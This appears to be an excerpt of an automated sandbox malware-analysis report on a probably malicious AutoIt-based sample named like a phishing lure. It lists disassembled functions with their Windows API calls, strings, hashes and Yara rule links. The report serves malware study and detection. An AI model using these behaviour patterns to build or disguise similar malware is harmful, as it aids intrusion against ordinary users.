                                                                                Function 004A7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClientRect.USER32(?), ref: 004A7452
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 004A7469
                                                                                • GetWindowDC.USER32(?), ref: 004A7475
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 004A7484
                                                                                • ReleaseDC.USER32(?,00000000), ref: 004A7496
                                                                                • GetSysColor.USER32(00000005), ref: 004A74B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                • String ID:
                                                                                • API String ID: 272304278-0
                                                                                • Opcode ID: e6cec01d4e7ba161fe7a0e14265194e2b51355243ae7effd8b4ba39dae5efd54
                                                                                • Instruction ID: baf15bcfb5f5b7c161e91159beba842a00e6ff84a9b861630623960c68a6ec6d
                                                                                • Opcode Fuzzy Hash: e6cec01d4e7ba161fe7a0e14265194e2b51355243ae7effd8b4ba39dae5efd54
                                                                                • Instruction Fuzzy Hash: E8018B31400255FFDB205F64DC88BAA7BB5FF18311F500165F926A61A2CB311E42AF59
                                                                                Function 004B1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004B187F
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 004B188B
                                                                                • CloseHandle.KERNEL32(?), ref: 004B1894
                                                                                • CloseHandle.KERNEL32(?), ref: 004B189C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B18A5
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B18AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 86be84aaa3148f7a7ca0c449e12fe4958467ea012c4fef8841f0814791c9fc53
                                                                                • Instruction ID: 5d87c4977c9e04f0a713b58718f9ae101553929b77fef8728e9e6116b8e17dad
                                                                                • Opcode Fuzzy Hash: 86be84aaa3148f7a7ca0c449e12fe4958467ea012c4fef8841f0814791c9fc53
                                                                                • Instruction Fuzzy Hash: 18E0ED36004141BBD7015FA1ED8C905FF39FF4A7217108630F62589072CB325422DF54
                                                                                Function 0045BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0045BEB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: D%R$D%R$D%R$D%RD%R
                                                                                • API String ID: 1385522511-3290291051
                                                                                • Opcode ID: 9d93eb0a436818ed5be7271c2ff501989c9b45578d96020dcfe4bbcf70e9fe7e
                                                                                • Instruction ID: a88f6e3af3835db5cc2c54c0d286b001947133f112c2154567dd44be0d5379e0
                                                                                • Opcode Fuzzy Hash: 9d93eb0a436818ed5be7271c2ff501989c9b45578d96020dcfe4bbcf70e9fe7e
                                                                                • Instruction Fuzzy Hash: 42918B75A0020ADFCB14CF58C0916AAB7F1FF59311F24816ED941AB352D739AD8ACBD8
                                                                                Function 004D7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00470242: EnterCriticalSection.KERNEL32(0052070C,00521884,?,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047024D
                                                                                  • Part of subcall function 00470242: LeaveCriticalSection.KERNEL32(0052070C,?,0046198B,00522518,?,?,?,004512F9,00000000), ref: 0047028A
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                • __Init_thread_footer.LIBCMT ref: 004D7BFB
                                                                                  • Part of subcall function 004701F8: EnterCriticalSection.KERNEL32(0052070C,?,?,00468747,00522514), ref: 00470202
                                                                                  • Part of subcall function 004701F8: LeaveCriticalSection.KERNEL32(0052070C,?,00468747,00522514), ref: 00470235
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                • String ID: +TJ$5$G$Variable must be of type 'Object'.
                                                                                • API String ID: 535116098-1441542163
                                                                                • Opcode ID: d1d0e8ee933574582eb650a9dfefe8c6db0af9a1b5179e789dfc122dd1515db8
                                                                                • Instruction ID: a61a0fc5c6901a662c878f4d8a59e5a8536b6b02a47f5ec6e049141e2b55d668
                                                                                • Opcode Fuzzy Hash: d1d0e8ee933574582eb650a9dfefe8c6db0af9a1b5179e789dfc122dd1515db8
                                                                                • Instruction Fuzzy Hash: 50919D74604208EFCB14EF55D8A19AEB7B2BF45304F10804FF8066B392EB39AE45CB59
                                                                                Function 004BC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004BC6EE
                                                                                • _wcslen.LIBCMT ref: 004BC735
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004BC79C
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004BC7CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                • String ID: 0
                                                                                • API String ID: 1227352736-4108050209
                                                                                • Opcode ID: 699ceab218fcabd43d0bdcf1d31b2f6bfc51f77265f3ae9a0522dccb18254153
                                                                                • Instruction ID: 811071f5047ddb328ba0b11cdc7ae0b4d393c385adea325370aaa08bb6a2c11b
                                                                                • Opcode Fuzzy Hash: 699ceab218fcabd43d0bdcf1d31b2f6bfc51f77265f3ae9a0522dccb18254153
                                                                                • Instruction Fuzzy Hash: 1351EF716043029BD7109F29C8C5BAB77E8AF99314F040A2FF995D3291DB68D808DB6A
                                                                                Function 004DAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 004DAEA3
                                                                                  • Part of subcall function 00457620: _wcslen.LIBCMT ref: 00457625
                                                                                • GetProcessId.KERNEL32(00000000), ref: 004DAF38
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DAF67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                • String ID: <$@
                                                                                • API String ID: 146682121-1426351568
                                                                                • Opcode ID: 74583219d4ebacf7c09af65d6a129727f3f3590c4f9d2c37db4313b33ea0f859
                                                                                • Instruction ID: c39075906de9554c2ede8b46c300d85fb358502159652f4085cd7375f6312a97
                                                                                • Opcode Fuzzy Hash: 74583219d4ebacf7c09af65d6a129727f3f3590c4f9d2c37db4313b33ea0f859
                                                                                • Instruction Fuzzy Hash: 9C717A71A00218DFCB14DF55C494A9EBBF1BF08318F0484AEE856AB392D778ED45CB99
                                                                                Function 004B719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B7206
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004B723C
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004B724D
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004B72CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 14bee8ff27f72fe658cc14af042c1a0d9e645e7db99ee2bcd211a2d8accd0f4f
                                                                                • Instruction ID: 08bb449fff92b4b97e30436468f1c0ad59709b8d9758a849e391482b4613c6a0
                                                                                • Opcode Fuzzy Hash: 14bee8ff27f72fe658cc14af042c1a0d9e645e7db99ee2bcd211a2d8accd0f4f
                                                                                • Instruction Fuzzy Hash: 6A416071A042049FDB19CF64C8C4ADA7BA9EF84314F1480AEFD059F24AD7B8DA45DBB4
                                                                                Function 004E3D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E3E35
                                                                                • IsMenu.USER32(?), ref: 004E3E4A
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E3E92
                                                                                • DrawMenuBar.USER32 ref: 004E3EA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                • String ID: 0
                                                                                • API String ID: 3076010158-4108050209
                                                                                • Opcode ID: ea5bdbecbfd5be987b5875ee04169467b03eff64d457b85b04aa0f3cdd4b1a50
                                                                                • Instruction ID: df079b39a80dba305d7c422e3f8ce8b7afe468bed9bb8d93750dfdfd54887ca3
                                                                                • Opcode Fuzzy Hash: ea5bdbecbfd5be987b5875ee04169467b03eff64d457b85b04aa0f3cdd4b1a50
                                                                                • Instruction Fuzzy Hash: B3419A74A00249EFDB11DF55D888EAABBB5FF49352F04412AE801AB350C334AE45CF54
                                                                                Function 004B1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                  • Part of subcall function 004B3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004B3CCA
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004B1E66
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004B1E79
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 004B1EA9
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 2081771294-1403004172
                                                                                • Opcode ID: 0e907d4eb9f6edd4fd630adf3ad6fef206bdf8706652f1697fbe485712b9513f
                                                                                • Instruction ID: 29ae5983d59f8c8eff1cb95b91d2f8d5b20e3181e606a262d666a3bd0fdc81d5
                                                                                • Opcode Fuzzy Hash: 0e907d4eb9f6edd4fd630adf3ad6fef206bdf8706652f1697fbe485712b9513f
                                                                                • Instruction Fuzzy Hash: 56212671A00144AADB14ABA5DC95CFFBBB9EF41354B50412FFC11A72E2DB3C8D0A9638
                                                                                Function 004DC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                • API String ID: 176396367-4004644295
                                                                                • Opcode ID: 8477d459ce17ef054e3cb2b6426fc654ddf56e6647323442e76789de4644a013
                                                                                • Instruction ID: e6669fe26a4db1697de1e7b48ffc4a583b23b23c289d6760a2292d4674c607c8
                                                                                • Opcode Fuzzy Hash: 8477d459ce17ef054e3cb2b6426fc654ddf56e6647323442e76789de4644a013
                                                                                • Instruction Fuzzy Hash: 2D31F772A0016B8BCB20DE6D89E02BF37A15BA1794B05401BE8456B345E678CD84D3A8
                                                                                Function 004E2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004E2F8D
                                                                                • LoadLibraryW.KERNEL32(?), ref: 004E2F94
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004E2FA9
                                                                                • DestroyWindow.USER32(?), ref: 004E2FB1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 3529120543-1011021900
                                                                                • Opcode ID: 849049d0c7ec15f651841964812cd456d54ec8580d79f91ef56eae38e7181b0f
                                                                                • Instruction ID: e7856e802e3b23f4a36c8234e09159df32922829e39b2f19d5cfe6d893aee216
                                                                                • Opcode Fuzzy Hash: 849049d0c7ec15f651841964812cd456d54ec8580d79f91ef56eae38e7181b0f
                                                                                • Instruction Fuzzy Hash: 2321F371600285ABEB104F66DD80FBB37BDFF59329F10022AF910D6290D7B5DC51A768
                                                                                Function 00474D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00474D1E,004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002), ref: 00474D8D
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00474DA0
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00474D1E,004828E9,?,00474CBE,004828E9,005188B8,0000000C,00474E15,004828E9,00000002,00000000), ref: 00474DC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: cf5a45ddad33a79fc863c7f1c7b6b8c73d56e1da3e7564f10386378fab467967
                                                                                • Instruction ID: 3ef788440981f6b8aea911efdcba22fa167630ef685cfca05edfb768fe5731b2
                                                                                • Opcode Fuzzy Hash: cf5a45ddad33a79fc863c7f1c7b6b8c73d56e1da3e7564f10386378fab467967
                                                                                • Instruction Fuzzy Hash: E7F04434540208BBDB115F90DC89BEEBFF5EF44752F0041A9F909A6251DB355941DA98
                                                                                Function 00454E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E9C
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00454EAE
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EC0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-3689287502
                                                                                • Opcode ID: f4e450fa4208dfaf72deff573a77bc24d99164436a025f67b42970810928f124
                                                                                • Instruction ID: 31f045f5be5f7d6e093344b38797d584aba256231469b0bdbaf916404625b50d
                                                                                • Opcode Fuzzy Hash: f4e450fa4208dfaf72deff573a77bc24d99164436a025f67b42970810928f124
                                                                                • Instruction Fuzzy Hash: C2E08635A016225B922117256C99B5BA654AFC2F677050126FC00DB206DB68CD4644A8
                                                                                Function 00454E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E62
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00454E74
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E87
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-1355242751
                                                                                • Opcode ID: bb450ee11cd9d006db0c38fce0f06f49a7092d028197165edf19d20fbd56a869
                                                                                • Instruction ID: 24baf2896b9e75f0fcc698adcd0e9b0ced203b1767472a4d630d714f5f36501a
                                                                                • Opcode Fuzzy Hash: bb450ee11cd9d006db0c38fce0f06f49a7092d028197165edf19d20fbd56a869
                                                                                • Instruction Fuzzy Hash: B2D0C2319026615B56221B257C99E8BAA18AFC1F263050226BC00AE216CF28CD42C9DC
                                                                                Function 004C2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2C05
                                                                                • DeleteFileW.KERNEL32(?), ref: 004C2C87
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004C2C9D
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2CAE
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C2CC0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
